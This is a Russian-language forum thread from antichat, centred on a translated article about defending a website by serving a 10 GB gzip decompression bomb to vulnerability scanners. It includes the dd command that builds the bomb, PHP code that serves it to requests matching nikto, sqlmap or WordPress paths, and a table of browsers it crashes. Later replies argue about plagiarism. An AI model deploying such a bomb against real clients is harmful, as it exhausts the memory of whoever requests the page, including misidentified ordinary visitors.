ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Этичный хакинг или пентестинг (https://forum.antichat.xyz/forumdisplay.php?f=209)
-   -   Как защитить сайт ZIP-бомбой или старые методы хороши и сегодня (https://forum.antichat.xyz/showthread.php?t=560738)

ghost 11.10.2017 15:55

https://forum.antichat.xyz/attachmen...1c365fe9bb.png

Если вы когда-нибудь размещали веб-сайт или даже администрировали сервера, то очень хорошо осведомлены о "плохих людях, которые пытаются сделать плохие вещи с вашими вещами". Если у вас есть сервер Linux с SSH, то он возможно уже подвергаются атаке. Вы можете увидеть сколько соединений каждый день делают попытки:

Код:


Код:

grep 'authentication failures' /var/log/auth.log
https://forum.antichat.xyz/attachmen...c84f87313e.png

Сотни неудачных попыток даже несмотря на то, что этот сервер отключил проверку пароля и работает на нестандартном порту.

WordPress обрекает всех

Если быть честным, web-сканеры уязвимостей существовали до Wordpress, но поскольку он так широко развернут, большинства сканеров включают сканирование для некоторых неправильно настроенных папок администратора или устаревших плагинов. Так что если захотеть, то можно скачать один из сканеров и начать тестирование, в надежде получить доступ к сайту и его порчу.

https://forum.antichat.xyz/attachmen...6e86af9744.png

Пример лог-файла во время сканирования с помощью инструмента Nikto

Вот почему всем администраторам серверов или веб-сайтов приходится иметь дело с гигабайтами логов, полным попыток сканирования. Поэтому мне было интересно...


Есть ли способ нанести ответный удар?


После "танцев с бубном" с реализацией IDS или Fail2ban я вспомнил о старой доброй ZIP-бомбе.

https://forum.antichat.xyz/attachmen...18a13f8888.png

Что такое ZIP-бомба?

Сжатие ZIP прекрасно с повторяющимися данными, так что если у вас есть действительно огромный текстовый файл, который состоит из повторяющихся данных, как например все нули, он будет сжимать его действительно хорошо. И это ОЧЕНЬ хорошо.
Как например 42.zip показывает нам, как можно сжать 4.5 Pb (4.500.000 Gb) файл до размера 42 Kb. Когда вы попытаетесь посмотреть на его содержание или распаковать, то скорее всего произойдет переполнение дискового пространства или ОЗУ.

Как использовать ZIP-бомбу против сканера уязвимостей?

К сожалению веб-браузеры не понимают ZIP, но они понимают GZIP. Так что сначала мы должны создать 10 GB файл GZIP, заполненый нулями. Мы могли бы сделать несколько сжатий, но давайте сейчас сделаем проще:

Код:


Код:

dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip
https://forum.antichat.xyz/attachmen...fd5c9cf646.png

Создание ZIP-бомбы и проверка ее размера

Можем видеть, что это 10 Mb. Могли бы сделать лучше, но на сейчас достаточно. Теперь, когда мы создали эту веЩь, давайте настроим PHP скрипт, который будет доставлять его к клиенту:

Код:


Код:

<?php
//prepare the client to recieve GZIP data. This will not be suspicious
//since most web servers use GZIP by default
header("Content-Encoding: gzip");
header("Content-Length: ".filesize('10G.gzip'));
//Turn off output buffering
if (ob_get_level()) ob_end_clean();
//send the gzipped file to the client
readfile('10G.gzip');

Ну вот!
Так что мы могли бы использовать это в качестве простой обороны, например:

Код:


Код:

<?php
$agent = filter_input(INPUT_SERVER, 'HTTP_USER_AGENT');

//check for nikto, sql map or "bad" subfolders which only exist on wordpress
if (strpos($agent, 'nikto') !== false || strpos($agent, 'sqlmap') !== false || startswith($url,'wp-') || startswith($url,'wordpress') || startswith($url,'wp/'))
{
      sendBomb();
      exit();
}

function sendBomb(){
        //prepare the client to recieve GZIP data. This will not be suspicious
        //since most web servers use GZIP by default
        header("Content-Encoding: gzip");
        header("Content-Length: ".filesize('10G.gzip'));
        //Turn off output buffering
        if (ob_get_level()) ob_end_clean();
        //send the gzipped file to the client
        readfile('10G.gzip');
}

function startsWith($a, $b) {
    return strpos($a, $b) === 0;
}

...

Таким образом. Что происходит, когда вызывается сценарий?

Клиент и результат

IE 11 - Переполнение памяти, падение IE
Chrome - Выскакивает ошибка о переполнение памяти
Edge - Переполнение памяти
Nikto - Кажется сканирование идет нормально и не выходит ошибку
SQLmap - Переполнение памяти до падения
Safari - Переполнение памяти, затем падает и перезагружается, и т.д...
Chrome (Android) - Выскакивает ошибка о переполнение памяти

(если вы проверили это с другими устройствами/браузерами/скриптами, пожалуйста, дайте ему знать, и он будет добавлять это здесь)

https://forum.antichat.xyz/attachmen...ba791aaa11.png

Реакция на вызов скрипта в Chrome

Если вы рискнете: попробуйте сами

Можете поверить на словоу меня от от этого Firefox умер и калий перестал реагировать на что либо до перезагрузки

ghost 16.10.2017 17:26

Цитата:


MrNik сказал(а):

42.zip очень старый архив любой ав заблокирует его,плюс плогиат на хакере стотья есть и архив от туда!


А при чем тут Хакер чтиво? Не нужно обвинять в копипасте этого материала. Взял и перевел отсюда.
Да назови хоть 42.zip, хоть 10G.gzip как в статье. Да как угодно, когда генерируешь.
И при чем тут антивирь вообще? Вникаете в статью, [S]читай между строк[/S] когда читаете?
ЭТО для защиты сайта/сервера от сканирования НЕ антивирем если что...

https://forum.antichat.xyz/attachmen...61d24e48c8.png

При переходе сюда и выполнении сценария php я едва успел скрин системного монитора сделать.
Затем память заполнилась и машина отказалась отзываться. Пришлось ребутнуть. Это для примера.
[doublepost=1508160363,1507741564][/doublepost]Да и вообще. Дополню по поводу:
Цитата:


42.zip очень старый архив любой ав заблокирует его,плюс плогиат на хакере стотья есть и архив от туда!

Возьмем например, недавнюю/свежую новость о новой уязвимости в WPA2. Примеры:
Уязвимости в WPA2 ставят под угрозу практически все Wi-Fi сети
Обнаружены критичные уязвимости в протоколе WPA2 — Key Reinstallation Attacks (KRACK)
Безопасность Wi-Fi под угрозой из-за множества обнаруженных в WPA2 уязвимостей
Так кто у кого скопипастил? Или немного включим моск и поищем на англоязычных источниках. Сами найдете?
Хотя и там сайты aka новостные агрегаторы аналогичные нашим, которые собирают новости с мелочи вроде этого.
Поэтому и уважаю формат форума, где каждый может делиться СВОИМ мнением. А не какие то там бложики.

P.S Уж извините за резкость @MrNik. Меня сложно вывести из себя, но ЭТО просто зацепило.

KALiNA 21.10.2017 00:25

Хороша статья! Мне понравилась, Автор молодец.

z3RoTooL 21.10.2017 00:47

Цитата:


MrNik сказал(а):

42.zip очень старый архив любой ав заблокирует его,плюс плогиат на хакере стотья есть и архив от туда!


просто кровь из глаз. ааааааааааааа


Время: 02:31